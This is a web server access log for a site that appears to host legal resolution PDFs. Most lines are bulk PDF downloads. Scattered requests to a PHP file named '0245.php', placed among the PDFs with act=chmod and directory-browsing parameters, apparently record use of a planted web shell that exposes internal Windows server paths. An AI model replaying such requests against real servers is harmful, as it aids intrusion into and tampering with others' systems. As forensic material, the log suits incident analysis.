47.128.31.103 - - [29/Apr/2024:01:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.31.103 - - [29/Apr/2024:01:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.31.103 - - [29/Apr/2024:01:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
18.226.214.218 - - [29/Apr/2024:01:45:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9601.pdf HTTP/1.1" 200 360402
191.108.31.20 - - [29/Apr/2024:01:45:32 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2187
3.224.220.101 - - [29/Apr/2024:01:45:33 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3661.pdf HTTP/1.1" 200 516009
23.22.35.162 - - [29/Apr/2024:01:45:34 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1811.pdf HTTP/1.1" 200 348119
191.108.31.20 - - [29/Apr/2024:01:45:34 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2183
23.22.35.162 - - [29/Apr/2024:01:45:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3659.pdf HTTP/1.1" 200 547010
18.216.148.0 - - [29/Apr/2024:01:45:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3550.pdf HTTP/1.1" 200 644631
216.245.221.92 - - [29/Apr/2024:01:45:42 -0500] "HEAD / HTTP/1.1" 200 -
18.116.80.2 - - [29/Apr/2024:01:45:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2361.pdf HTTP/1.1" 200 794940
52.70.240.171 - - [29/Apr/2024:01:45:43 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1808.pdf HTTP/1.1" 200 345965
18.116.80.2 - - [29/Apr/2024:01:45:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/RESOLUCION%20318%20DE%202000.pdf HTTP/1.1" 200 502411
18.221.156.94 - - [29/Apr/2024:01:45:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2842.pdf HTTP/1.1" 200 491028
52.70.240.171 - - [29/Apr/2024:01:45:47 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1807.pdf HTTP/1.1" 200 349696
18.221.156.94 - - [29/Apr/2024:01:45:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0699.pdf HTTP/1.1" 200 532461
18.221.156.94 - - [29/Apr/2024:01:45:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0053.pdf HTTP/1.1" 200 378118
13.59.104.97 - - [29/Apr/2024:01:45:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/0048.pdf HTTP/1.1" 200 397946
18.216.35.67 - - [29/Apr/2024:01:45:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0093.pdf HTTP/1.1" 200 283365
52.70.240.171 - - [29/Apr/2024:01:45:50 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3657.pdf HTTP/1.1" 200 533504
13.59.104.97 - - [29/Apr/2024:01:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/3960.pdf HTTP/1.1" 200 651544
13.59.104.97 - - [29/Apr/2024:01:45:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3831.pdf HTTP/1.1" 200 362312
18.216.35.67 - - [29/Apr/2024:01:45:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6822.pdf HTTP/1.1" 200 399686
18.216.35.67 - - [29/Apr/2024:01:45:52 -0500] "GET /BLA/resoluciones/AUTOS%202010/3149.pdf HTTP/1.1" 200 357706
47.128.127.18 - - [29/Apr/2024:01:45:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=page20.swf HTTP/1.1" 200 2714
18.117.102.150 - - [29/Apr/2024:01:45:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2135.pdf HTTP/1.1" 200 253490
3.139.236.178 - - [29/Apr/2024:01:45:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/3415.pdf HTTP/1.1" 200 456185
18.117.102.150 - - [29/Apr/2024:01:45:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1396.pdf HTTP/1.1" 200 80427
18.117.102.150 - - [29/Apr/2024:01:45:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3049.pdf HTTP/1.1" 200 763146
18.117.102.150 - - [29/Apr/2024:01:45:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2321.pdf HTTP/1.1" 200 359278
3.224.220.101 - - [29/Apr/2024:01:45:55 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1804.pdf HTTP/1.1" 200 1104277
18.117.102.150 - - [29/Apr/2024:01:45:55 -0500] "GET /BLA/resoluciones/AUTOS%202023/03204.pdf HTTP/1.1" 200 1034502
18.117.102.150 - - [29/Apr/2024:01:45:56 -0500] "GET /BLA/resoluciones/AUTOS%202023/3014.pdf HTTP/1.1" 200 318692
18.117.102.150 - - [29/Apr/2024:01:45:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7903.pdf HTTP/1.1" 200 525959
18.224.179.54 - - [29/Apr/2024:01:45:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/2005.pdf HTTP/1.1" 200 253450
52.70.240.171 - - [29/Apr/2024:01:45:57 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3656.pdf HTTP/1.1" 200 528289
3.139.236.178 - - [29/Apr/2024:01:45:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1718.pdf HTTP/1.1" 200 283984
18.224.179.54 - - [29/Apr/2024:01:45:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6885.pdf HTTP/1.1" 200 340341
18.224.179.54 - - [29/Apr/2024:01:45:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8544.pdf HTTP/1.1" 200 483525
18.224.179.54 - - [29/Apr/2024:01:45:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2055.pdf HTTP/1.1" 200 856987
3.16.29.218 - - [29/Apr/2024:01:46:00 -0500] "GET /BLA/resoluciones/AUTOS%202023/0128.pdf HTTP/1.1" 200 1582524
18.216.224.168 - - [29/Apr/2024:01:46:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0263.pdf HTTP/1.1" 200 348676
18.218.12.180 - - [29/Apr/2024:01:46:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4410.pdf HTTP/1.1" 200 668542
3.224.220.101 - - [29/Apr/2024:01:46:02 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1802.pdf HTTP/1.1" 200 801163
18.216.224.168 - - [29/Apr/2024:01:46:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1770.pdf HTTP/1.1" 200 373919
3.16.29.218 - - [29/Apr/2024:01:46:03 -0500] "GET /BLA/resoluciones/AUTOS%202010/5780.pdf HTTP/1.1" 200 9470428
18.219.178.236 - - [29/Apr/2024:01:46:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2065.pdf HTTP/1.1" 200 544689
18.218.12.180 - - [29/Apr/2024:01:46:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0240.pdf HTTP/1.1" 200 419061
18.218.12.180 - - [29/Apr/2024:01:46:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/1490.pdf HTTP/1.1" 200 515813
18.218.12.180 - - [29/Apr/2024:01:46:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2459.pdf HTTP/1.1" 200 211620
3.145.172.39 - - [29/Apr/2024:01:46:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3630.pdf HTTP/1.1" 200 224870
3.224.220.101 - - [29/Apr/2024:01:46:06 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3651.pdf HTTP/1.1" 200 402421
18.219.178.236 - - [29/Apr/2024:01:46:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5324.pdf HTTP/1.1" 200 958144
18.219.178.236 - - [29/Apr/2024:01:46:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9437.pdf HTTP/1.1" 200 515195
18.217.12.173 - - [29/Apr/2024:01:46:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1670.pdf HTTP/1.1" 200 80349
18.217.12.173 - - [29/Apr/2024:01:46:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/3051.pdf HTTP/1.1" 200 1985080
3.145.172.39 - - [29/Apr/2024:01:46:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/3478.pdf HTTP/1.1" 200 400025
3.16.29.218 - - [29/Apr/2024:01:46:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8811.pdf HTTP/1.1" 200 516952
18.217.12.173 - - [29/Apr/2024:01:46:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/1177.pdf HTTP/1.1" 200 775859
18.217.12.173 - - [29/Apr/2024:01:46:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0586.pdf HTTP/1.1" 200 67777
3.224.220.101 - - [29/Apr/2024:01:46:11 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1797.pdf HTTP/1.1" 200 346061
18.217.12.173 - - [29/Apr/2024:01:46:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3979.pdf HTTP/1.1" 200 428691
18.217.12.173 - - [29/Apr/2024:01:46:12 -0500] "GET /BLA/resoluciones/AUTOS%202018/4443.pdf HTTP/1.1" 200 289701
3.16.29.218 - - [29/Apr/2024:01:46:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6248.pdf HTTP/1.1" 200 476667
13.58.93.51 - - [29/Apr/2024:01:46:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6284.pdf HTTP/1.1" 200 431679
3.16.29.218 - - [29/Apr/2024:01:46:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9645.pdf HTTP/1.1" 200 516779
23.22.35.162 - - [29/Apr/2024:01:46:14 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3650.pdf HTTP/1.1" 200 395716
13.58.93.51 - - [29/Apr/2024:01:46:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0447.pdf HTTP/1.1" 200 73661
3.16.29.218 - - [29/Apr/2024:01:46:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2474.pdf HTTP/1.1" 200 757526
3.16.29.218 - - [29/Apr/2024:01:46:16 -0500] "GET /BLA/resoluciones/AUTOS%202018/1790.pdf HTTP/1.1" 200 2471710
47.128.119.150 - - [29/Apr/2024:01:46:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=page20_thumbnail.jpg&white=1 HTTP/1.1" 200 2750
3.16.29.218 - - [29/Apr/2024:01:46:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1996.pdf HTTP/1.1" 200 564941
3.224.220.101 - - [29/Apr/2024:01:46:19 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1796.pdf HTTP/1.1" 200 346633
3.144.1.58 - - [29/Apr/2024:01:46:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0541.pdf HTTP/1.1" 200 866166
3.224.220.101 - - [29/Apr/2024:01:46:22 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3649.pdf HTTP/1.1" 200 466729
3.131.135.101 - - [29/Apr/2024:01:46:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0316.pdf HTTP/1.1" 200 87119
3.131.135.101 - - [29/Apr/2024:01:46:22 -0500] "GET /BLA/resoluciones/AUTOS%202022/3684.pdf HTTP/1.1" 200 447403
18.117.196.52 - - [29/Apr/2024:01:46:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/05506.pdf HTTP/1.1" 200 730534
3.224.220.101 - - [29/Apr/2024:01:46:26 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1795.pdf HTTP/1.1" 200 347047
18.117.196.52 - - [29/Apr/2024:01:46:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4622.pdf HTTP/1.1" 200 644521
18.117.196.52 - - [29/Apr/2024:01:46:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3955.pdf HTTP/1.1" 200 514005
172.22.2.4 - - [29/Apr/2024:01:44:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
13.58.90.148 - - [29/Apr/2024:01:46:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2032.pdf HTTP/1.1" 200 516328
13.58.90.148 - - [29/Apr/2024:01:46:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2456.pdf HTTP/1.1" 200 365546
13.58.90.148 - - [29/Apr/2024:01:46:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/4949.pdf HTTP/1.1" 200 394740
52.14.209.115 - - [29/Apr/2024:01:46:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2150.pdf HTTP/1.1" 200 518011
23.22.35.162 - - [29/Apr/2024:01:46:35 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1794.pdf HTTP/1.1" 200 347347
3.138.32.9 - - [29/Apr/2024:01:46:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/3918.pdf HTTP/1.1" 200 409375
3.224.220.101 - - [29/Apr/2024:01:46:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3646.pdf HTTP/1.1" 200 501712
3.17.166.149 - - [29/Apr/2024:01:46:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7933.pdf HTTP/1.1" 200 531797
3.17.166.149 - - [29/Apr/2024:01:46:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3220.pdf HTTP/1.1" 200 996271
3.17.166.149 - - [29/Apr/2024:01:46:40 -0500] "GET /BLA/resoluciones/AUTOS%202022/6278.pdf HTTP/1.1" 200 419067
3.17.166.149 - - [29/Apr/2024:01:46:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/2140.pdf HTTP/1.1" 200 324443
3.17.166.149 - - [29/Apr/2024:01:46:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0195.pdf HTTP/1.1" 200 330067
3.17.166.149 - - [29/Apr/2024:01:46:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1680.pdf HTTP/1.1" 200 695250
47.128.127.163 - - [29/Apr/2024:01:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cblkrefl%5C&f=1.png&imgsize=50 HTTP/1.1" 200 15567
23.22.35.162 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1793.pdf HTTP/1.1" 200 349920
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
18.117.141.50 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/5682.pdf HTTP/1.1" 200 417358
47.128.127.163 - - [29/Apr/2024:01:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.127.163 - - [29/Apr/2024:01:46:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.127.163 - - [29/Apr/2024:01:46:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.127.163 - - [29/Apr/2024:01:46:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.127.163 - - [29/Apr/2024:01:46:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.129.92.231 - - [29/Apr/2024:01:46:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7392.pdf HTTP/1.1" 200 949921
18.117.141.50 - - [29/Apr/2024:01:46:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2697.pdf HTTP/1.1" 200 406448
18.117.141.50 - - [29/Apr/2024:01:46:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/3048.pdf HTTP/1.1" 200 316105
18.117.141.50 - - [29/Apr/2024:01:46:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1136.pdf HTTP/1.1" 200 352122
18.117.141.50 - - [29/Apr/2024:01:46:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2516.pdf HTTP/1.1" 200 291599
18.117.141.50 - - [29/Apr/2024:01:46:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/2740.pdf HTTP/1.1" 200 283451
23.22.35.162 - - [29/Apr/2024:01:46:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3631.pdf HTTP/1.1" 200 608732
18.117.141.50 - - [29/Apr/2024:01:46:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1261.pdf HTTP/1.1" 200 423093
3.129.92.231 - - [29/Apr/2024:01:46:47 -0500] "GET /BLA/resoluciones/AUTOS%202010/5488.pdf HTTP/1.1" 200 142267
52.70.240.171 - - [29/Apr/2024:01:46:50 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1791.pdf HTTP/1.1" 200 555660
52.70.240.171 - - [29/Apr/2024:01:46:54 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1790.pdf HTTP/1.1" 200 993452
18.216.62.43 - - [29/Apr/2024:01:46:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/3532.pdf HTTP/1.1" 200 1128577
3.224.220.101 - - [29/Apr/2024:01:46:58 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3630.pdf HTTP/1.1" 200 593291
18.216.62.43 - - [29/Apr/2024:01:46:59 -0500] "GET /BLA/resoluciones/AUTOS%202022/9178%20.pdf HTTP/1.1" 200 349595
18.216.62.43 - - [29/Apr/2024:01:46:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6574.pdf HTTP/1.1" 200 439792
18.216.62.43 - - [29/Apr/2024:01:47:00 -0500] "GET /BLA/resoluciones/AUTOS%202023/05733.pdf HTTP/1.1" 200 612944
3.147.81.127 - - [29/Apr/2024:01:47:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/5698.pdf HTTP/1.1" 200 380722
13.59.137.248 - - [29/Apr/2024:01:47:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4939.pdf HTTP/1.1" 200 1437129
3.147.81.127 - - [29/Apr/2024:01:47:02 -0500] "GET /BLA/resoluciones/AUTOS%202010/4831.pdf HTTP/1.1" 200 371772
23.22.35.162 - - [29/Apr/2024:01:47:02 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1784.pdf HTTP/1.1" 200 2816407
3.147.81.127 - - [29/Apr/2024:01:47:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/7851.pdf HTTP/1.1" 200 398071
3.147.81.127 - - [29/Apr/2024:01:47:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/0252.pdf HTTP/1.1" 200 446104
13.59.137.248 - - [29/Apr/2024:01:47:04 -0500] "GET /BLA/resoluciones/AUTOS%202022/6649.pdf HTTP/1.1" 200 399024
13.59.137.248 - - [29/Apr/2024:01:47:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3454.pdf HTTP/1.1" 200 296588
13.59.137.248 - - [29/Apr/2024:01:47:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8326.pdf HTTP/1.1" 200 477370
13.59.137.248 - - [29/Apr/2024:01:47:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4556.pdf HTTP/1.1" 200 330108
13.59.137.248 - - [29/Apr/2024:01:47:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3226.pdf HTTP/1.1" 200 520724
52.70.240.171 - - [29/Apr/2024:01:47:06 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3609.pdf HTTP/1.1" 200 375018
18.222.197.243 - - [29/Apr/2024:01:47:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/8365.pdf HTTP/1.1" 200 448573
47.128.127.223 - - [29/Apr/2024:01:47:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=page48_thumbnail.jpg&imgsize=50 HTTP/1.1" 200 2749
18.222.197.243 - - [29/Apr/2024:01:47:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4357.pdf HTTP/1.1" 200 56548
18.222.197.243 - - [29/Apr/2024:01:47:08 -0500] "GET /BLA/resoluciones/AUTOS%202018/4867.pdf HTTP/1.1" 200 346513
18.222.197.243 - - [29/Apr/2024:01:47:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1198.pdf HTTP/1.1" 200 402964
18.222.197.243 - - [29/Apr/2024:01:47:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1124.pdf HTTP/1.1" 200 54846
23.22.35.162 - - [29/Apr/2024:01:47:10 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1783.pdf HTTP/1.1" 200 1087129
18.216.154.7 - - [29/Apr/2024:01:47:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1254.pdf HTTP/1.1" 200 452387
18.216.154.7 - - [29/Apr/2024:01:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/1612.pdf HTTP/1.1" 200 1297224
18.216.154.7 - - [29/Apr/2024:01:47:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1478.pdf HTTP/1.1" 200 476348
18.216.154.7 - - [29/Apr/2024:01:47:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0706.pdf HTTP/1.1" 200 613891
18.216.154.7 - - [29/Apr/2024:01:47:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0023.pdf HTTP/1.1" 200 340897
18.216.154.7 - - [29/Apr/2024:01:47:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/3376.pdf HTTP/1.1" 200 3004266
3.137.209.225 - - [29/Apr/2024:01:47:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6895.pdf HTTP/1.1" 200 329829
3.137.209.225 - - [29/Apr/2024:01:47:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9745.pdf HTTP/1.1" 200 303551
23.22.35.162 - - [29/Apr/2024:01:47:15 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3606.pdf HTTP/1.1" 200 375411
18.225.255.26 - - [29/Apr/2024:01:47:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/2547.pdf HTTP/1.1" 200 2869118
3.18.102.38 - - [29/Apr/2024:01:47:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7898.pdf HTTP/1.1" 200 430544
172.22.2.4 - - [29/Apr/2024:01:45:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
18.225.255.26 - - [29/Apr/2024:01:47:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0165.pdf HTTP/1.1" 200 2460908
18.225.255.26 - - [29/Apr/2024:01:47:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2188.pdf HTTP/1.1" 200 759697
18.119.119.204 - - [29/Apr/2024:01:47:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1843.pdf HTTP/1.1" 200 284394
3.224.220.101 - - [29/Apr/2024:01:47:20 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1782.pdf HTTP/1.1" 200 351140
18.119.119.204 - - [29/Apr/2024:01:47:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0613.pdf HTTP/1.1" 200 310943
18.119.119.204 - - [29/Apr/2024:01:47:21 -0500] "GET /BLA/resoluciones/AUTOS%202020/4545.pdf HTTP/1.1" 200 417743
18.119.119.204 - - [29/Apr/2024:01:47:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0665.pdf HTTP/1.1" 200 370067
52.70.240.171 - - [29/Apr/2024:01:47:22 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3605.pdf HTTP/1.1" 200 346127
3.134.98.15 - - [29/Apr/2024:01:47:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2620.pdf HTTP/1.1" 200 476067
18.217.158.214 - - [29/Apr/2024:01:47:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8857.pdf HTTP/1.1" 200 366556
18.217.158.214 - - [29/Apr/2024:01:47:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4211.pdf HTTP/1.1" 200 338664
18.217.158.214 - - [29/Apr/2024:01:47:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/1031.pdf HTTP/1.1" 200 287821
23.22.35.162 - - [29/Apr/2024:01:47:26 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1781.pdf HTTP/1.1" 200 343776
18.217.158.214 - - [29/Apr/2024:01:47:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8027.pdf HTTP/1.1" 200 547904
18.217.158.214 - - [29/Apr/2024:01:47:26 -0500] "GET /BLA/resoluciones/AUTOS%202010/6625.pdf HTTP/1.1" 200 1761408
18.217.158.214 - - [29/Apr/2024:01:47:27 -0500] "GET /BLA/resoluciones/AUTOS%202018/5353.pdf HTTP/1.1" 200 268576
18.224.251.139 - - [29/Apr/2024:01:47:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2408.pdf HTTP/1.1" 200 415110
18.117.103.28 - - [29/Apr/2024:01:47:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7121.pdf HTTP/1.1" 200 489281
3.133.139.169 - - [29/Apr/2024:01:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/4409.pdf HTTP/1.1" 200 267086
47.128.127.247 - - [29/Apr/2024:01:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5C&f=vence.php&white=1 HTTP/1.1" 200 342
18.224.251.139 - - [29/Apr/2024:01:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/05929.pdf HTTP/1.1" 200 666992
52.70.240.171 - - [29/Apr/2024:01:47:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1773.pdf HTTP/1.1" 200 342896
18.224.251.139 - - [29/Apr/2024:01:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/4313.pdf HTTP/1.1" 200 413057
18.224.251.139 - - [29/Apr/2024:01:47:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5399.pdf HTTP/1.1" 200 492893
18.117.103.28 - - [29/Apr/2024:01:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202022/2919.pdf HTTP/1.1" 200 422692
3.133.139.169 - - [29/Apr/2024:01:47:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4552.pdf HTTP/1.1" 200 335311
3.133.139.169 - - [29/Apr/2024:01:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/2985.pdf HTTP/1.1" 200 398068
3.133.139.169 - - [29/Apr/2024:01:47:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2584.pdf HTTP/1.1" 200 461178
3.133.139.169 - - [29/Apr/2024:01:47:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/3323.pdf HTTP/1.1" 200 290496
3.140.186.22 - - [29/Apr/2024:01:47:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0833.pdf HTTP/1.1" 200 488513
23.22.35.162 - - [29/Apr/2024:01:47:37 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3584.pdf HTTP/1.1" 200 369680
23.22.35.162 - - [29/Apr/2024:01:47:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1771.pdf HTTP/1.1" 200 374721
3.224.220.101 - - [29/Apr/2024:01:47:44 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3579.pdf HTTP/1.1" 200 378047
